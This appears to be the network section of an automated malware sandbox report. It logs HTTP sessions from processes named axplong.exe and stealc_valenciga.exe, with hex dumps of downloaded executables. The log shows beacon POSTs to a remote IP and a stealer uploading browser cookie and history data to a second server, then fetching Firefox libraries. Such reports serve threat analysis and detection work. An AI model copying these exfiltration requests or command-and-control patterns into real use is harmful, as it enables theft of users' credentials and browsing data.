                                                                                                                                                                                                                                                  Last-Modified: Sun, 29 Dec 2024 05:25:36 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6770dd50-e2428"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 b9 e8 6f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 26 03 00 00 60 01 00 00 00 00 00 80 6e 01 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 0e 00 00 08 00 00 fc 44 0e 00 03 00 40 c2 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 16 04 00 3c 00 00 00 00 a0 04 00 cb 04 00 00 00 00 00 00 00 00 00 00 00 fe 0d 00 28 26 00 00 00 b0 04 00 24 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d3 03 00 18 00 00 00 38 5e 03 00 c0 00 00 00 00 00 00 00 00 00 00 00 b4 17 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELog&`n@`D@<(&$'8^p.text:$& `.rdata@.@@.data:P,2@.tls^@.rsrc`@@.reloc$'(f@B.bss@.bssF@
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910659075 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910670042 CET448INData Raw: 88 8c 05 dc fd ff ff 8b 85 d8 fd ff ff 83 c0 01 89 85 d8 fd ff ff e9 9e ff ff ff c7 85 d8 fd ff ff 00 00 00 00 c7 85 d4 fd ff ff 00 00 00 00 81 bd d8 fd ff ff 00 01 00 00 0f 8d 6c 00 00 00 8b 85 d4 fd ff ff 8b 8d d8 fd ff ff 0f b6 8c 0d dc fe ff
                                                                                                                                                                                                                                                  Data Ascii: l$D$;EGE
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910687923 CET1236INData Raw: 89 85 b0 fd ff ff 8b 85 b0 fd ff ff 83 38 00 0f 86 38 00 00 00 8b 85 b0 fd ff ff 8b 00 83 e0 01 83 f8 00 0f 85 1f 00 00 00 8b 85 b0 fd ff ff 8b 00 8d 0d f5 d8 43 00 89 0c 24 89 44 24 04 e8 50 08 00 00 e9 15 00 00 00 e9 00 00 00 00 8d 8d b8 fd ff
                                                                                                                                                                                                                                                  Data Ascii: 88C$D$Pt7$ l$
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910742998 CET1236INData Raw: 10 c7 46 70 01 00 00 00 89 e0 89 10 e8 ce 21 00 00 83 ec 04 66 89 46 20 e9 00 00 00 00 8b 4e 1c 66 8b 46 20 0f b7 d0 89 e0 89 10 e8 cf 20 00 00 83 ec 04 66 89 46 1a e9 00 00 00 00 e8 8e 21 00 00 66 89 c1 66 8b 46 1a 0f b7 c9 89 0c 24 0f b7 c0 89
                                                                                                                                                                                                                                                  Data Ascii: Fp!fF NfF fF!ffF$D$e F`F`F\FXF\EE*~`NPFTM@ FM@ NFp fF
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910753965 CET1236INData Raw: c4 04 5e 5d c3 cc cc cc cc cc cc 55 89 e5 56 83 ec 50 8b 45 0c 8b 45 08 a1 40 6c 44 00 31 e8 89 45 f8 c7 45 f3 05 01 55 0f c7 45 f0 05 ff 25 05 c7 45 ec e9 a0 00 00 c7 45 e4 09 16 00 00 c7 45 dc 00 00 00 00 c7 45 d8 00 00 00 00 c7 45 d4 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: ^]UVPEE@lD1EEUE%EEEEEE)@@PD@IPDEEE5(EEMU$L$D$D$EzDC$D$TDE}E5@EMME
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910765886 CET1236INData Raw: 1f 84 00 00 00 00 00 55 83 ec 08 83 c5 0c 8d 4d dc e8 b1 00 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 18 8b 45 08 89 45 f4 89 45 fc 8b 45 0c 8b 45 0c 89 45 f8 c7 04 24 01 00 00 00 c7 44 24 04 02 00 00 00 e8 44 51 00
                                                                                                                                                                                                                                                  Data Ascii: UM]UEEEEEE$D$DQUE$L$D$<PE]UMMM$xdEEHMtDME]UPMM]USWVX
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910909891 CET328INData Raw: cc cc cc 55 89 e5 50 89 4d fc 8b 45 fc 83 c4 04 5d c3 cc 55 89 e5 50 89 4d fc 8b 45 fc c7 00 00 00 00 00 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 28 89 4d fc 8b 4d fc 89 4d e4
                                                                                                                                                                                                                                                  Data Ascii: UPME]UPME@@]U(MMMEMEEEEEEEME8^EMU$L$D$xMEU)U$D$eEEE(]
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910922050 CET1236INData Raw: 8b 4d 08 89 0c 24 89 44 24 04 e8 0c 00 00 00 83 c4 0c 5d c2 08 00 cc cc cc cc cc 55 89 e5 83 ec 08 8b 45 0c 8b 45 08 81 7d 0c 00 10 00 00 0f 82 12 00 00 00 8d 4d 08 8d 45 0c 89 0c 24 89 44 24 04 e8 25 00 00 00 8b 45 0c 8b 4d 08 89 0c 24 89 44 24
                                                                                                                                                                                                                                                  Data Ascii: M$D$]UEE}ME$D$%EM$D$]UEEE#EEE@EEE+EE}}#ME]UEMEEEE
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910933971 CET1236INData Raw: 00 89 04 24 e8 e6 09 01 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 18 8b 45 08 89 4d f8 8b 4d f8 89 4d e8 e8 89 02 00 00 8b 4d e8 89 45 f4 e8 5e ff ff ff 89 45 f0 8b 45 f4 8b 4d f0 8b 55 f4 d1 ea 29 d1 39 c8 0f 86 0b 00 00 00 8b
                                                                                                                                                                                                                                                  Data Ascii: $UEMMMME^EEMU)9EE*EMEE;EEEEEE]UPEEME$6]UEEEEM]UEE]U(EE
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910949945 CET448INData Raw: 0c 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 0c 8b 45 08 89 4d fc 8b 4d fc 89 4d f8 8b 45 08 89 04 24 e8 23 00 00 00 83 ec 04 8b 45 f8 8d 0d f8 40 43 00 89 08 83 c4 0c 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                  Data Ascii: ]UEMMME$#E@C]UEMEEAC1$D$D$`EM$D$DE]UPMM]UEMMME$D$


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.449842185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:13.586829901 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 30 39 35 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1009574001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:14.291461945 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:13 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.449884185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:18.494901896 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 30 34 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1010456001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:19.203191042 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:18 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.449920135.181.65.216806128C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:21.554183960 CET201OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDH
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 991
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:21.554195881 CET991OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32
                                                                                                                                                                                                                                                  Data Ascii: ------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:22.230469942 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:22 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:22.451318979 CET202OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 1451
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:22.451391935 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32
                                                                                                                                                                                                                                                  Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:22.770015001 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:22 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:22.805202961 CET564OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file"------DGHJEHJJDAAAKEBGCFCA--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:23.022346973 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:22 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:23.697843075 CET564OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="file"------EHIDAKECFIEBGDHJEBKK--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:23.906028032 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:23 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.260215998 CET93OUTGET /4a21a126be249f0d/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.531883001 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:24 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.531898022 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                  Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.531908989 CET1236INData Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff
                                                                                                                                                                                                                                                  Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh|$,}uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.531925917 CET1236INData Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01
                                                                                                                                                                                                                                                  Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.531936884 CET1236INData Raw: 00 00 00 0f 57 c8 0f 11 8c 0e 9c 00 00 00 83 c1 20 83 c3 fe 75 a6 eb 02 31 c9 f6 c2 01 74 28 0f 10 04 0f 0f 10 4c 0e 0c 0f 57 c8 0f 10 84 0e 8c 00 00 00 0f 11 4c 0e 0c 0f 10 0c 0f 0f 57 c8 0f 11 8c 0e 8c 00 00 00 31 db 8b 55 ac 39 c2 74 6b f6 c2
                                                                                                                                                                                                                                                  Data Ascii: W u1t(LWLW1U9tkt0T0U19t<f.0L0L0LL09uM17L^_[]USWVh1
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.531948090 CET1236INData Raw: f0 8d 86 00 ff ff ff 3d 00 ff ff ff 77 0a 68 0e e0 ff ff e9 d0 00 00 00 8b 45 08 85 c0 0f 84 c0 00 00 00 8d 9d f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 50 e8 28 f9 07 00 83 c4 0c bf 00 01 00 00 0f 1f 80 00 00 00 00 56 ff 75 0c 53 e8 0f f9 07 00
                                                                                                                                                                                                                                                  Data Ascii: =whEhh !P(VuS)9wWuSufDT>\>=t%>>f1h
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.531959057 CET1236INData Raw: 45 d0 0f 84 a4 00 00 00 89 55 e0 89 5d dc 8b 45 ec 04 01 89 4d d4 0f b6 c8 8a 5d e8 8b 55 f0 8a 24 0a 00 e3 0f b6 f3 8b 55 f0 8a 3c 32 8b 55 f0 88 3c 0a 8b 55 f0 88 24 32 00 e7 0f b6 f7 8b 4d 10 8a 21 8b 4d f0 32 24 31 8b 4d d4 8b 55 e4 88 22 ba
                                                                                                                                                                                                                                                  Data Ascii: EU]EM]U$U<2U<U$2M!M2$1MU")UtDEU$U<2U<U$2MaM2$1MUbu-]En~uMMUEEM]}7
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.531970978 CET1236INData Raw: 04 0f 82 3a 03 00 00 0f b6 c9 89 4d ec 31 c0 89 d1 89 7d e4 89 5d dc 66 0f 1f 84 00 00 00 00 00 89 45 e8 8b 55 e4 8b 04 02 89 45 d4 8b 45 e8 8b 55 ec 8d 44 02 01 89 d3 0f b6 c0 8b 7d f0 0f b6 14 07 00 d1 0f b6 f1 8a 34 37 88 34 07 88 14 37 00 d6
                                                                                                                                                                                                                                                  Data Ascii: :M1}]fEUEEUD}4747EED}4}4EUEUu}<7}<U2u4EUU}4}
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:24.531981945 CET1224INData Raw: 01 cb 8b 52 14 89 95 3c ff ff ff 8b 4e 0c 89 8d a8 fe ff ff 11 d1 8b 46 28 89 85 c8 fe ff ff 01 c3 89 5d d4 8b 46 2c 89 85 cc fe ff ff 11 c1 8b 7e 4c 31 cf 8b 46 48 31 d8 81 f7 8c 68 05 9b 35 1f 6c 3e 2b 89 fb 81 c3 3b a7 ca 84 89 5d dc 89 c6 81
                                                                                                                                                                                                                                                  Data Ascii: R<NF(]F,~L1FH1h5l>+;]gu33`tSUSU`UM11UTEEMM11E`tS
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:25.226876974 CET93OUTGET /4a21a126be249f0d/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:25.429371119 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:25 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 608080
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
